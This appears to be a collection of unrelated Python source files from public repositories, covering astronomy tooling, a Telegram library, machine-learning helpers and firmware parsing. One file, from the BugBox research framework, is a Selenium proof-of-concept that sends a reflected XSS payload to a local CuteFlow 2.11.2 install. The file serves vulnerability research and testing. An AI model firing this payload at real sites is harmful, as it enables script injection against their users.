self.hdr_mapping = {}
return
# header should be present now
if not self.hdr_mapping:
self.logger.error("First clusters received but header not found")
continue
# remove headers from triggers (i.e. any trigger starting with #)
triggers = [trigger for trigger in triggers if not trigger.startswith('#')]
# triggers is empty if only header was received
if not triggers:
self.logger.info("Only header received - Canceling processing")
continue
# split strings and convert to numpy array
try:
triggers = np.array(list(map(lambda val: val.split(), triggers)), dtype=float)
except Exception as e:
self.logger.error("Failed to process triggers: {}".format(e))
continue
# pick columns to feed to clustering algorithm
triggers_for_clustering = triggers[:, (self.hdr_mapping['DM'], self.hdr_mapping['SNR'],
self.hdr_mapping['time'], self.hdr_mapping['integration_step'],
self.hdr_mapping['beam_id'])]
# known source and new source triggering, in thread so clustering itself does not
# delay next run
# known source triggering
if src_type is not None:
self.threads['trigger_known_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_src)
self.threads['trigger_known_source'].start()
# new source triggering
self.threads['trigger_new_source'] = threading.Thread(target=self._check_triggers,
args=(triggers_for_clustering, sys_params,
utc_start, datetimesource),
kwargs=thresh_new)
self.threads['trigger_new_source'].start()
sleep(self.interval)
self.logger.info("Observation finished")
def _get_pointing(self):
"""
Get pointing of this CB from parset
:return: pointing SkyCoord
"""
# read parset
try:
parset = self.obs_config['parset']
except KeyError as e:
self.logger.error("Cannot read parset ({})".format(e))
return None
# read beam
try:
beam = self.obs_config['beam']
except KeyError as e:
self.logger.error("Cannot read beam from parset, setting CB to 0 ({})".format(e))
beam = 0
# read beam coordinates from parset
try:
key = "task.beamSet.0.compoundBeam.{}.phaseCenter".format(beam)
c1, c2 = ast.literal_eval(parset[key].replace('deg', ''))
c1 = c1 * u.deg
c2 = c2 * u.deg
except Exception as e:
self.logger.error("Could not parse pointing for CB{:02d} ({})".format(beam, e))
return None
# convert HA to RA if HADEC is used
if parset['task.directionReferenceFrame'].upper() == 'HADEC':
# Get RA at the mid point of the observation
timestamp = Time(parset['task.startTime']) + .5 * float(parset['task.duration']) * u.s
c1, c2 = util.radec_to_hadec(c1, c2, timestamp)
# create SkyCoord object
pointing = SkyCoord(c1, c2)
return pointing
def _load_parset(self, obs_config):
"""
Load the observation parset
:param dict obs_config: Observation config
:return: parset as dict
"""
try:
# encoded parset is already in config on master node
# decode the parset
raw_parset = util.decode_parset(obs_config['parset'])
# convert to dict and store
parset = util.parse_parset(raw_parset)
except KeyError:
self.logger.info("Observation parset not found in input config, looking for master parset")
# Load the parset from the master parset file
master_config_file = os.path.join(obs_config['master_dir'], 'parset', 'darc_master.parset')
try:
# Read raw config
with open(master_config_file) as f:
master_config = f.read().strip()
# Convert to dict
master_config = util.parse_parset(master_config)
# extract obs parset and decode
raw_parset = util.decode_parset(master_config['parset'])
parset = util.parse_parset(raw_parset)
except Exception as e:
self.logger.warning(
"Failed to load parset from master config file {}, "
"setting parset to None: {}".format(master_config_file, e))
parset = None
return parset
| 2.140625 | 2 |
tools/load_demo_data.py | glenn2763/skyportal | 0 | 3332 | import datetime
import os
import subprocess
import base64
from pathlib import Path
import shutil
import pandas as pd
import signal
import requests
from baselayer.app.env import load_env
from baselayer.app.model_util import status, create_tables, drop_tables
from social_tornado.models import TornadoStorage
from skyportal.models import init_db, Base, DBSession, Source, User
from skyportal.model_util import setup_permissions, create_token
from skyportal.tests import api
from baselayer.tools.test_frontend import verify_server_availability
if __name__ == "__main__":
"""Insert test data"""
env, cfg = load_env()
basedir = Path(os.path.dirname(__file__)) / ".."
with status(f"Connecting to database {cfg['database']['database']}"):
init_db(**cfg["database"])
with status("Dropping all tables"):
drop_tables()
with status("Creating tables"):
create_tables()
for model in Base.metadata.tables:
print(" -", model)
with status(f"Creating permissions"):
setup_permissions()
with status(f"Creating dummy users"):
super_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
group_admin_user = User(
username="<EMAIL>", role_ids=["Super admin"]
)
full_user = User(username="<EMAIL>", role_ids=["Full user"])
view_only_user = User(
username="<EMAIL>", role_ids=["View only"]
)
DBSession().add_all(
[super_admin_user, group_admin_user, full_user, view_only_user]
)
for u in [super_admin_user, group_admin_user, full_user, view_only_user]:
DBSession().add(
TornadoStorage.user.create_social_auth(u, u.username, "google-oauth2")
)
with status("Creating token"):
token = create_token(
[
"Manage groups",
"Manage sources",
"Upload data",
"Comment",
"Manage users",
],
super_admin_user.id,
"load_demo_data token",
)
def assert_post(endpoint, data):
response_status, data = api("POST", endpoint, data, token)
        if not (response_status == 200 and data["status"] == "success"):
            raise RuntimeError(
                f'API call to {endpoint} failed with status {response_status}: {data["message"]}'
            )
return data
with status("Launching web app & executing API calls"):
try:
response_status, data = api("GET", "sysinfo", token=token)
app_already_running = True
except requests.ConnectionError:
app_already_running = False
web_client = subprocess.Popen(
["make", "run"], cwd=basedir, preexec_fn=os.setsid
)
server_url = f"http://localhost:{cfg['ports.app']}"
print()
print(f"Waiting for server to appear at {server_url}...")
try:
verify_server_availability(server_url)
print("App running - continuing with API calls")
with status("Creating dummy group & adding users"):
data = assert_post(
"groups",
data={
"name": "Stream A",
"group_admins": [
super_admin_user.username,
group_admin_user.username,
],
},
)
group_id = data["data"]["id"]
for u in [view_only_user, full_user]:
data = assert_post(
f"groups/{group_id}/users/{u.username}", data={"admin": False}
)
with status("Creating dummy instruments"):
data = assert_post(
"telescope",
data={
"name": "Palomar 1.5m",
"nickname": "P60",
"lat": 33.3633675,
"lon": -116.8361345,
"elevation": 1870,
"diameter": 1.5,
"group_ids": [group_id],
},
)
telescope1_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "P60 Camera",
"type": "phot",
"band": "optical",
"telescope_id": telescope1_id,
},
)
instrument1_id = data["data"]["id"]
data = assert_post(
"telescope",
data={
"name": "Nordic Optical Telescope",
"nickname": "NOT",
"lat": 28.75,
"lon": 17.88,
"elevation": 1870,
"diameter": 2.56,
"group_ids": [group_id],
},
)
telescope2_id = data["data"]["id"]
data = assert_post(
"instrument",
data={
"name": "ALFOSC",
"type": "both",
"band": "optical",
"telescope_id": telescope2_id,
},
)
with status("Creating dummy sources"):
SOURCES = [
{
"id": "14gqr",
"ra": 353.36647,
"dec": 33.646149,
"redshift": 0.063,
"group_ids": [group_id],
"comments": [
"No source at transient location to R>26 in LRIS imaging",
"Strong calcium lines have emerged.",
],
},
{
"id": "16fil",
"ra": 322.718872,
"dec": 27.574113,
"redshift": 0.0,
"group_ids": [group_id],
"comments": ["Frogs in the pond", "The eagle has landed"],
},
]
(basedir / "static/thumbnails").mkdir(parents=True, exist_ok=True)
for source_info in SOURCES:
comments = source_info.pop("comments")
data = assert_post("sources", data=source_info)
assert data["data"]["id"] == source_info["id"]
for comment in comments:
data = assert_post(
"comment",
data={"source_id": source_info["id"], "text": comment},
)
phot_file = basedir / "skyportal/tests/data/phot.csv"
phot_data = pd.read_csv(phot_file)
data = assert_post(
"photometry",
data={
"source_id": source_info["id"],
"time_format": "iso",
"time_scale": "utc",
"instrument_id": instrument1_id,
"observed_at": phot_data.observed_at.tolist(),
"mag": phot_data.mag.tolist(),
"e_mag": phot_data.e_mag.tolist(),
"lim_mag": phot_data.lim_mag.tolist(),
"filter": phot_data["filter"].tolist(),
},
)
spec_file = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"skyportal",
"tests",
"data",
"spec.csv",
)
spec_data = pd.read_csv(spec_file)
for i, df in spec_data.groupby("instrument_id"):
data = assert_post(
"spectrum",
data={
"source_id": source_info["id"],
"observed_at": str(datetime.datetime(2014, 10, 24)),
"instrument_id": 1,
"wavelengths": df.wavelength.tolist(),
"fluxes": df.flux.tolist(),
},
)
for ttype in ["new", "ref", "sub"]:
fname = f'{source_info["id"]}_{ttype}.png'
fpath = basedir / f"skyportal/tests/data/{fname}"
thumbnail_data = base64.b64encode(
open(os.path.abspath(fpath), "rb").read()
)
data = assert_post(
"thumbnail",
data={
"source_id": source_info["id"],
"data": thumbnail_data,
"ttype": ttype,
},
)
source = Source.query.get(source_info["id"])
source.add_linked_thumbnails()
finally:
if not app_already_running:
print("Terminating web app")
os.killpg(os.getpgid(web_client.pid), signal.SIGTERM)
| 1.875 | 2 |
framework/Exploits/CUTEFLOW_0024.py | UncleWillis/BugBox | 1 | 3333 |
# Copyright 2013 University of Maryland. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE.TXT file.
import sys
import os
import time
from selenium.common.exceptions import NoAlertPresentException
import framework
class Exploit (framework.Exploit):
attributes = {'Name' : "CUTEFLOW_0024",
'Description' : "CuteFlow v2.11.2 cross site scripting attack.",
'References' : [['http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/']],
'Target' : "CuteFlow 2.11.2",
'TargetLicense' : '',
'VulWikiPage' : "",
'Type' : 'XSS'
}
def __init__(self, visible=False):
framework.Exploit.__init__(self, visible)
self.verified = False
return
def exploit(self):
driver = self.create_selenium_driver()
driver.get("http://localhost/cuteflow/pages/showmaillist.php?sortby=\"><script>alert(\"XSS\");</script><p+\"")
self.logger.info("XSS link visited")
try:
driver.get_alert()
self.logger.info("XSS popup comfirmed")
self.verified = True
except NoAlertPresentException:
self.logger.error("XSS failed")
if self.visible:
time.sleep(10)
driver.cleanup()
return
def verify(self):
return self.verified
| 2.40625 | 2 |
telethon/tl/custom/button.py | HosseyNJF/Telethon | 4 | 3334 | <reponame>HosseyNJF/Telethon
from .. import types
from ... import utils
class Button:
"""
.. note::
This class is used to **define** reply markups, e.g. when
sending a message or replying to events. When you access
`Message.buttons <telethon.tl.custom.message.Message.buttons>`
they are actually `MessageButton
<telethon.tl.custom.messagebutton.MessageButton>`,
so you might want to refer to that class instead.
Helper class to allow defining ``reply_markup`` when
sending a message with inline or keyboard buttons.
    You should make use of the defined class methods to create button
    instances instead of making them yourself (i.e. don't do ``Button(...)``
    but instead use methods like `Button.inline(...) <inline>` etc.).
You can use `inline`, `switch_inline`, `url` and `auth`
together to create inline buttons (under the message).
You can use `text`, `request_location`, `request_phone` and `request_poll`
together to create a reply markup (replaces the user keyboard).
You can also configure the aspect of the reply with these.
The latest message with a reply markup will be the one shown to the user
(messages contain the buttons, not the chat itself).
    You **cannot** mix the two types of buttons together,
and it will error if you try to do so.
The text for all buttons may be at most 142 characters.
If more characters are given, Telegram will cut the text
to 128 characters and add the ellipsis (…) character as
    the 129th.
"""
def __init__(self, button, *, resize, single_use, selective):
self.button = button
self.resize = resize
self.single_use = single_use
self.selective = selective
@staticmethod
def _is_inline(button):
"""
Returns `True` if the button belongs to an inline keyboard.
"""
return isinstance(button, (
types.KeyboardButtonCallback,
types.KeyboardButtonSwitchInline,
types.KeyboardButtonUrl,
types.InputKeyboardButtonUrlAuth
))
@staticmethod
def inline(text, data=None):
"""
Creates a new inline button with some payload data in it.
If `data` is omitted, the given `text` will be used as `data`.
In any case `data` should be either `bytes` or `str`.
Note that the given `data` must be less or equal to 64 bytes.
If more than 64 bytes are passed as data, ``ValueError`` is raised.
If you need to store more than 64 bytes, consider saving the real
data in a database and a reference to that data inside the button.
When the user clicks this button, `events.CallbackQuery
<telethon.events.callbackquery.CallbackQuery>` will trigger with the
same data that the button contained, so that you can determine which
button was pressed.
"""
if not data:
data = text.encode('utf-8')
elif not isinstance(data, (bytes, bytearray, memoryview)):
data = str(data).encode('utf-8')
if len(data) > 64:
raise ValueError('Too many bytes for the data')
return types.KeyboardButtonCallback(text, data)
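    # Usage sketch (assumes a bot-authorized TelegramClient `client` and a target `chat`;
    # both names are illustrative and not defined in this module):
    #   await client.send_message(chat, 'Proceed?', buttons=[
    #       [Button.inline('Yes', b'yes'), Button.inline('No', b'no')]
    #   ])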
@staticmethod
def switch_inline(text, query='', same_peer=False):
"""
Creates a new inline button to switch to inline query.
If `query` is given, it will be the default text to be used
when making the inline query.
If ``same_peer is True`` the inline query will directly be
set under the currently opened chat. Otherwise, the user will
have to select a different dialog to make the query.
When the user clicks this button, after a chat is selected, their
input field will be filled with the username of your bot followed
by the query text, ready to make inline queries.
"""
return types.KeyboardButtonSwitchInline(text, query, same_peer)
@staticmethod
def url(text, url=None):
"""
Creates a new inline button to open the desired URL on click.
If no `url` is given, the `text` will be used as said URL instead.
You cannot detect that the user clicked this button directly.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to open the displayed URL unless
the domain is trusted, and once confirmed the URL will open in their
device.
"""
return types.KeyboardButtonUrl(text, url or text)
@staticmethod
def auth(text, url=None, *, bot=None, write_access=False, fwd_text=None):
"""
Creates a new inline button to authorize the user at the given URL.
You should set the `url` to be on the same domain as the one configured
for the desired `bot` via `@BotFather <https://t.me/BotFather>`_ using
the ``/setdomain`` command.
For more information about letting the user login via Telegram to
a certain domain, see https://core.telegram.org/widgets/login.
If no `url` is specified, it will default to `text`.
Args:
bot (`hints.EntityLike`):
The bot that requires this authorization. By default, this
is the bot that is currently logged in (itself), although
you may pass a different input peer.
.. note::
For now, you cannot use ID or username for this argument.
If you want to use a different bot than the one currently
logged in, you must manually use `client.get_input_entity()
<telethon.client.users.UserMethods.get_input_entity>`.
write_access (`bool`):
Whether write access is required or not.
This is `False` by default (read-only access).
fwd_text (`str`):
The new text to show in the button if the message is
forwarded. By default, the button text will be the same.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to login to the specified domain.
"""
return types.InputKeyboardButtonUrlAuth(
text=text,
url=url or text,
bot=utils.get_input_user(bot or types.InputUserSelf()),
request_write_access=write_access,
fwd_text=fwd_text
)
@classmethod
def text(cls, text, *, resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button with the given text.
Args:
resize (`bool`):
If present, the entire keyboard will be reconfigured to
be resized and be smaller if there are not many buttons.
single_use (`bool`):
If present, the entire keyboard will be reconfigured to
be usable only once before it hides itself.
selective (`bool`):
If present, the entire keyboard will be reconfigured to
be "selective". The keyboard will be shown only to specific
users. It will target users that are @mentioned in the text
of the message or to the sender of the message you reply to.
When the user clicks this button, a text message with the same text
as the button will be sent, and can be handled with `events.NewMessage
<telethon.events.newmessage.NewMessage>`. You cannot distinguish
between a button press and the user typing and sending exactly the
same text on their own.
"""
return cls(types.KeyboardButton(text),
resize=resize, single_use=single_use, selective=selective)
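    # Reply-keyboard usage sketch (names are assumptions; sending keyboards requires a bot account):
    #   await client.send_message(chat, 'Pick one', buttons=[
    #       [Button.text('A', resize=True), Button.text('B', resize=True)]
    #   ])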
@classmethod
def request_location(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's location on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their location with the
bot, and if confirmed a message with geo media will be sent.
"""
return cls(types.KeyboardButtonRequestGeoLocation(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_phone(cls, text, *,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user's phone on click.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a confirmation box will be shown
to the user asking whether they want to share their phone with the
bot, and if confirmed a message with contact media will be sent.
"""
return cls(types.KeyboardButtonRequestPhone(text),
resize=resize, single_use=single_use, selective=selective)
@classmethod
def request_poll(cls, text, *, force_quiz=False,
resize=None, single_use=None, selective=None):
"""
Creates a new keyboard button to request the user to create a poll.
If `force_quiz` is `False`, the user will be allowed to choose whether
they want their poll to be a quiz or not. Otherwise, the user will be
forced to create a quiz when creating the poll.
If a poll is a quiz, there will be only one answer that is valid, and
the votes cannot be retracted. Otherwise, users can vote and retract
        the vote, and the poll might be multiple choice.
``resize``, ``single_use`` and ``selective`` are documented in `text`.
When the user clicks this button, a screen letting the user create a
poll will be shown, and if they do create one, the poll will be sent.
"""
return cls(types.KeyboardButtonRequestPoll(text, quiz=force_quiz),
resize=resize, single_use=single_use, selective=selective)
@staticmethod
def clear():
"""
Clears all keyboard buttons after sending a message with this markup.
When used, no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardHide()
@staticmethod
def force_reply():
"""
Forces a reply to the message with this markup. If used,
no other button should be present or it will be ignored.
"""
return types.ReplyKeyboardForceReply()
| 3.328125 | 3 |
src/main/resources/pys/join.py | addUsername/javaBoring | 0 | 3335 | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 7 20:14:22 2020
Simple script to join json files
@author: SERGI
"""
import json
import sys
import os
def readJson(path):
with open(path, "r") as file:
return json.load(file)
def writeJson(path, dicc):
with open(path, "w") as file:
json.dump(dicc, file)
if __name__ == "__main__":
print("hello from python", flush=True)
jsonPath = str(sys.argv[1])
# =============================================================================
# jsonPath = "../eclipse-workspace/prueba/target/json/"
# =============================================================================
jsonPathTemp = jsonPath+"temp/"
arr = os.listdir(jsonPathTemp)
arr.sort()
print(arr)
dict_to_json = {}
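    # NOTE: exactly four partial result files are expected in the temp directory (sorted by name);
    # their list values are merged key by key below by simple concatenation.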
dict_0 = readJson(jsonPathTemp + arr[0])
dict_1 = readJson(jsonPathTemp + arr[1])
dict_2 = readJson(jsonPathTemp + arr[2])
dict_3 = readJson(jsonPathTemp + arr[3])
keys = [name for name in dict_0.keys() if "0" not in name]
for key in keys:
dict_to_json[key] = dict_0[key] + dict_1[key] + dict_2[key] + dict_3[key]
#0seg,f_step,f_stop
seg = dict_0['0seg,f_step,f_stop'][0]
step = dict_0['0seg,f_step,f_stop'][1]
stop = dict_3['0seg,f_step,f_stop'][2]
dict_to_json['0seg,f_step,f_stop'] = [seg, step, stop]
print("Escribiendo json: ", jsonPath+arr[0], flush=True)
writeJson(jsonPath+arr[0], dict_to_json)
print("finish", flush=True) | 3.203125 | 3 |
app/grandchallenge/challenges/migrations/0023_auto_20200123_1102.py | njmhendrix/grand-challenge.org | 1 | 3336 | # Generated by Django 3.0.2 on 2020-01-23 11:02
import re
import django.contrib.postgres.fields.citext
import django.core.validators
from django.db import migrations
import grandchallenge.challenges.models
class Migration(migrations.Migration):
dependencies = [
("challenges", "0022_auto_20200121_1639"),
]
operations = [
migrations.AlterField(
model_name="challenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
migrations.AlterField(
model_name="externalchallenge",
name="short_name",
field=django.contrib.postgres.fields.citext.CICharField(
help_text="short name used in url, specific css, files etc. No spaces allowed",
max_length=50,
unique=True,
validators=[
grandchallenge.challenges.models.validate_nounderscores,
django.core.validators.RegexValidator(
re.compile("^[-a-zA-Z0-9_]+\\Z"),
"Enter a valid “slug” consisting of letters, numbers, underscores or hyphens.",
"invalid",
),
grandchallenge.challenges.models.validate_short_name,
],
),
),
]
| 2 | 2 |
autosk_dev_test/component/LinReg.py | hmendozap/master-arbeit-files | 2 | 3337 | <reponame>hmendozap/master-arbeit-files
import numpy as np
import scipy.sparse as sp
from HPOlibConfigSpace.configuration_space import ConfigurationSpace
from HPOlibConfigSpace.conditions import EqualsCondition, InCondition
from HPOlibConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, Constant
from autosklearn.pipeline.components.base import AutoSklearnRegressionAlgorithm
from autosklearn.pipeline.constants import *
class LinReg(AutoSklearnRegressionAlgorithm):
def __init__(self, number_updates, batch_size, dropout_output,
learning_rate, solver, lambda2,
momentum=0.99, beta1=0.9, beta2=0.9, rho=0.95,
lr_policy='fixed', gamma=0.01, power=1.0, epoch_step=2,
random_state=None):
self.number_updates = number_updates
self.batch_size = batch_size
self.dropout_output = dropout_output
self.learning_rate = learning_rate
self.lr_policy = lr_policy
self.lambda2 = lambda2
self.momentum = momentum
self.beta1 = 1-beta1 if beta1 is not None else 0.9
self.beta2 = 1-beta2 if beta2 is not None else 0.99
self.rho = rho
self.solver = solver
self.gamma = gamma
self.power = power
self.epoch_step = epoch_step
# Empty features and shape
self.n_features = None
self.input_shape = None
self.m_issparse = False
self.m_isregression = True
self.m_isbinary = False
self.m_ismultilabel = False
self.estimator = None
def _prefit(self, X, y):
self.batch_size = int(self.batch_size)
self.n_features = X.shape[1]
self.input_shape = (self.batch_size, self.n_features)
self.num_output_units = 1 # Regression
# Normalize the output
self.mean_y = np.mean(y)
self.std_y = np.std(y)
y = (y - self.mean_y) / self.std_y
if len(y.shape) == 1:
y = y[:, np.newaxis]
self.m_issparse = sp.issparse(X)
return X, y
def fit(self, X, y):
Xf, yf = self._prefit(X, y)
epoch = (self.number_updates * self.batch_size)//X.shape[0]
number_epochs = min(max(2, epoch), 110) # Cap the max number of possible epochs
from implementation import LogisticRegression
self.estimator = LogisticRegression.LogisticRegression(batch_size=self.batch_size,
input_shape=self.input_shape,
num_output_units=self.num_output_units,
dropout_output=self.dropout_output,
learning_rate=self.learning_rate,
lr_policy=self.lr_policy,
lambda2=self.lambda2,
momentum=self.momentum,
beta1=self.beta1,
beta2=self.beta2,
rho=self.rho,
solver=self.solver,
num_epochs=number_epochs,
gamma=self.gamma,
power=self.power,
epoch_step=self.epoch_step,
is_sparse=self.m_issparse,
is_binary=self.m_isbinary,
is_multilabel=self.m_ismultilabel,
is_regression=self.m_isregression)
self.estimator.fit(Xf, yf)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
preds = self.estimator.predict(X, self.m_issparse)
return preds * self.std_y + self.mean_y
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
return self.estimator.predict_proba(X, self.m_issparse)
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'lin_reg',
'name': 'Linear Regression',
'handles_regression': True,
'handles_classification': False,
'handles_multiclass': False,
'handles_multilabel': False,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None):
policy_choices = ['fixed', 'inv', 'exp', 'step']
batch_size = UniformIntegerHyperparameter("batch_size",
100, 3000,
log=True,
default=150)
number_updates = UniformIntegerHyperparameter("number_updates",
500, 10500,
log=True,
default=500)
dropout_output = UniformFloatHyperparameter("dropout_output", 0.0, 0.99,
default=0.5)
lr = UniformFloatHyperparameter("learning_rate", 1e-6, 0.1,
log=True,
default=0.01)
l2 = UniformFloatHyperparameter("lambda2", 1e-6, 1e-2,
log=True,
default=1e-3)
solver = CategoricalHyperparameter(name="solver",
choices=["sgd", "adam"],
default="sgd")
beta1 = UniformFloatHyperparameter("beta1", 1e-4, 0.1,
log=True,
default=0.1)
beta2 = UniformFloatHyperparameter("beta2", 1e-4, 0.1,
log=True,
default=0.01)
lr_policy = CategoricalHyperparameter(name="lr_policy",
choices=policy_choices,
default='fixed')
gamma = UniformFloatHyperparameter(name="gamma",
lower=1e-3, upper=1e-1,
default=1e-2)
power = UniformFloatHyperparameter("power",
0.0, 1.0,
default=0.5)
epoch_step = UniformIntegerHyperparameter("epoch_step",
2, 20,
default=5)
cs = ConfigurationSpace()
cs.add_hyperparameter(number_updates)
cs.add_hyperparameter(batch_size)
cs.add_hyperparameter(dropout_output)
cs.add_hyperparameter(lr)
cs.add_hyperparameter(l2)
cs.add_hyperparameter(solver)
cs.add_hyperparameter(beta1)
cs.add_hyperparameter(beta2)
cs.add_hyperparameter(lr_policy)
cs.add_hyperparameter(gamma)
cs.add_hyperparameter(power)
cs.add_hyperparameter(epoch_step)
beta1_depends_on_solver = EqualsCondition(beta1, solver, "adam")
beta2_depends_on_solver = EqualsCondition(beta2, solver, "adam")
gamma_depends_on_policy = InCondition(child=gamma, parent=lr_policy,
values=['inv', 'exp', 'step'])
power_depends_on_policy = EqualsCondition(power, lr_policy, 'inv')
epoch_step_depends_on_policy = EqualsCondition(epoch_step,
lr_policy, 'step')
cs.add_condition(beta1_depends_on_solver)
cs.add_condition(beta2_depends_on_solver)
cs.add_condition(gamma_depends_on_policy)
cs.add_condition(power_depends_on_policy)
cs.add_condition(epoch_step_depends_on_policy)
return cs
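# Rough standalone usage sketch (hyperparameter values and data names are assumptions;
# in practice this component is instantiated by the auto-sklearn pipeline itself):
#   model = LinReg(number_updates=1000, batch_size=150, dropout_output=0.5,
#                  learning_rate=0.01, solver='sgd', lambda2=1e-3)
#   model.fit(X_train, y_train)
#   y_pred = model.predict(X_test)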
| 1.757813 | 2 |
python_work/Chapter5/exe3_alien_color.py | Elektra-2/python_crash_course_2nd | 1 | 3338 | <filename>python_work/Chapter5/exe3_alien_color.py
# Creating a elif chain
alien_color = 'red'
if alien_color == 'green':
print('Congratulations! You won 5 points!')
elif alien_color == 'yellow':
print('Congratulations! You won 10 points!')
elif alien_color == 'red':
print('Congratulations! You won 15 points!')
| 3.984375 | 4 |
DigiPsych_API/Data_Science_API/evaluate_model.py | larryzhang95/Voice-Analysis-Pipeline | 7 | 3339 | import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.model_selection import learning_curve, validation_curve
# Plot learning curve
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(
estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid(True)
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Validation score")
plt.legend(loc="best")
plt.show()
return plt
# Plot validation curve
def plot_validation_curve(estimator, title, X, y, param_name, param_range, ylim=None, cv=None,
n_jobs=1, train_sizes=np.linspace(.1, 1.0, 5)):
    train_scores, test_scores = validation_curve(estimator, X, y, param_name=param_name,
                                                 param_range=param_range, cv=cv)
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
plt.plot(param_range, train_mean, color='r', marker='o', markersize=5, label='Training score')
plt.fill_between(param_range, train_mean + train_std, train_mean - train_std, alpha=0.15, color='r')
plt.plot(param_range, test_mean, color='g', linestyle='--', marker='s', markersize=5, label='Validation score')
plt.fill_between(param_range, test_mean + test_std, test_mean - test_std, alpha=0.15, color='g')
plt.grid(True)
plt.xscale('log')
plt.legend(loc='best')
plt.xlabel('Parameter')
plt.ylabel('Score')
plt.ylim(ylim)
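# A minimal, self-contained sketch of calling the two helpers above. It assumes
# scikit-learn's bundled iris dataset and a LogisticRegression estimator purely
# for illustration; any estimator with fit/predict works the same way.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.linear_model import LogisticRegression
    X, y = load_iris(return_X_y=True)
    estimator = LogisticRegression(max_iter=1000)
    # Learning curve: score vs. number of training examples with 5-fold CV.
    plot_learning_curve(estimator, "LogisticRegression learning curve", X, y, cv=5)
    # Validation curve: score vs. regularisation strength C (log-scaled x axis).
    plot_validation_curve(estimator, "LogisticRegression validation curve", X, y,
                          param_name="C", param_range=np.logspace(-3, 3, 7), cv=5)
    plt.show()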
| 3.5 | 4 |
oomi/__init__.py | sremes/oomi | 0 | 3340 | """Utilities for downloading comsumption data from Oomi."""
from oomi.oomi_downloader import OomiDownloader, OomiConfig
| 1.25 | 1 |
BaseTools/Source/Python/UPT/Object/Parser/InfMisc.py | KaoTuz/edk2-stable202108 | 9 | 3341 | ## @file
# This file is used to define class objects of INF file miscellaneous.
# Include BootMode/HOB/Event and others. It will be consumed by InfParser.
#
# Copyright (c) 2011 - 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
'''
InfMisc
'''
import Logger.Log as Logger
from Logger import ToolError
from Library import DataType as DT
from Object.Parser.InfCommonObject import InfSectionCommonDef
from Library.Misc import Sdict
##
# BootModeObject
#
class InfBootModeObject():
def __init__(self):
self.SupportedBootModes = ''
self.HelpString = ''
self.Usage = ''
def SetSupportedBootModes(self, SupportedBootModes):
self.SupportedBootModes = SupportedBootModes
def GetSupportedBootModes(self):
return self.SupportedBootModes
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# EventObject
#
class InfEventObject():
def __init__(self):
self.EventType = ''
self.HelpString = ''
self.Usage = ''
def SetEventType(self, EventType):
self.EventType = EventType
def GetEventType(self):
return self.EventType
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
##
# HobObject
#
class InfHobObject():
def __init__(self):
self.HobType = ''
self.Usage = ''
self.SupArchList = []
self.HelpString = ''
def SetHobType(self, HobType):
self.HobType = HobType
def GetHobType(self):
return self.HobType
def SetUsage(self, Usage):
self.Usage = Usage
def GetUsage(self):
return self.Usage
def SetSupArchList(self, ArchList):
self.SupArchList = ArchList
def GetSupArchList(self):
return self.SupArchList
def SetHelpString(self, HelpString):
self.HelpString = HelpString
def GetHelpString(self):
return self.HelpString
##
# InfSpecialCommentObject
#
